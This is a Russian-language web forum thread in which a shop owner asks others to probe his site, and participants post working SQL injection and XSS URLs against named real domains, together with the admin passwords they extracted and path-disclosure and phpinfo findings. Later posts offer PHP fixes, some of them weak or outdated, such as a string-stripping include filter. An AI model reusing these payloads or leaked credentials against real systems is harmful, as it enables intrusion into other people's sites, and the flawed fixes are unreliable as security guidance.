Проверьте плз на уязвимости
www.casualwear.com.ua

ну ты даешь автор, такую херню продавать за такие бабки.. =\ (я о скриптах)
http://casualwear.com.ua/list.php?link=19+union+select+1,concat_ws(0x3a,pas s,version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3+from+adminip/*
http://casualwear.com.ua/admin.php?admin
pass:vfhrtnbyu

http://nevius.ru/list.php?link=19+union+select+1,2,3,concat_ws(0x3a ,pass,version()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7+from+adminip/*
http://nevius.ru/admin.php
pass:nevada

c411k обогнал... я просто только заметил.. там кста тоже скуль и ксс


sql-inj, XSS..
http://casualwear.com.ua/list.php?c=Pringle+of+Scotland'+%22%3E%3Cscript%3E alert(/halkfild/)%3C/script%3E/*

http://casualwear.com.ua/list.php?c=Pringle+of+Scotland'+order+by+33/*

вообщем дальше не интересно.. так как есть пасс :( и вообще полное разоблачение.. :)

*добавлено

раскрытие путей
http://casualwear.com.ua/adminexe.php?export
var/www/casualwear/casualwear.com.ua/adminexe.php

Конечно с c411k не сравнить, но
Раскрытие пути :)
http://www.casualwear.com.ua/list.php?c=NOmeR1&r=&page[]
И XSS
http://www.casualwear.com.ua/list.php?srmin="><script>alert()</script>

Огромное спасибо, всем по +!

А скриптами я не торгую, просто стянул демку и переписал под себя магаз.

Если не трудно. скажите как от этого всего защититься. Заранее благодарю.

Огромное спасибо, всем по +!

А скриптами я не торгую, просто стянул демку и переписал под себя магаз.

Если не трудно. скажите как от этого всего защититься. Заранее благодарю.
Я писал по жтому поводу скрипты. Ещё раз напишу
XSS

<?
...
$_GET['уязвимое_поле'] = htmlspecialchars($_GET['уязвимое_поле']);
...
?>
PHP-inj
<?
error_reporting(0);

...

function inc($do,$inc,$posle)
{

$inc = htmlspecialchars($inc);

if(file($do.$inc.$posle))
{
$inc = str_replace('http','',$inc);
$inc = str_replace('ftp','',$inc);
$inc = str_replace(':','',$inc);
$inc = str_replace('/','',$inc);
$inc = str_replace('\\','',$inc);
$inc = str_replace('.','',$inc);

include($do.$inc.$posle);
}

else echo 'Файла не существует';

}

...

if($_GET['page']) inc('',$_GET['page'],'.php');

...

?>
SQL-inj:

<?
...
function secure_sql($value) {
if( get_magic_quotes_gpc() ) {
$value = stripslashes( $value );
}
if( function_exists( "mysql_real_escape_string" ) ) {
$value = mysql_real_escape_string( $value );
} else {
$value = addslashes( $value );
}
return $value;
}
...
?>

Вроде фсе поправил. Попробуйте щас поковырять.

Сайт прежний www.casualwear.com.ua

xss
http://casualwear.com.ua/list.php?c=%22%3E%3Cscript%3Ealert()%3C/script%3E&r=&page=1&ord=ord&srmin=0&srmax=100000000&a=&p=1

Вроде фсе поправил. Попробуйте щас поковырять.

Сайт прежний www.casualwear.com.ua
Фильтруй все что приходит от пользователя, "ГЕТ, ПОСТ, КУККИСЫ, даже переменые SERVER" и все будет ОК

посылать на ... - это конечно очень эстетично, и наверно очень помогает обезопасить сайт, но все же фильтрации символа запятой не достаточно:

http://www.casualwear.com.ua/list.php?link=114+union+select+1%2C2%2C3%2Cpass%2C 5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C 16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C 26%2C27%2C28%2C29%2C30%2C31%2C32%2C33+from+adminip/*

pass:1234567890
админка там же все подходит =\

Пасс ужо сменили на 123 хз кто...
Мда...
Серьёзно...

Вроде фсе пафиксил... Пробуйте дальше, как обычно с меня +

что ты пофиксил?

http://www.casualwear.com.ua/list.php?link=97+and+1=1/* работает
http://www.casualwear.com.ua/list.php?link=97+and+1=2/* нет

Про плюсики забуфф

в данном случае проще всего фильтровать интвалом

intval - получает целочисленное значение переменной.

Описание
int intval (mixed var [, int base])


if (isset($_GET['link'])) $link = intval($_GET['link']);

http://casualwear.com.ua/phpinfo.php
приватная информация

http://casualwear.com.ua/phpinfo.php - фигню спрячь, досихпор не спрятал.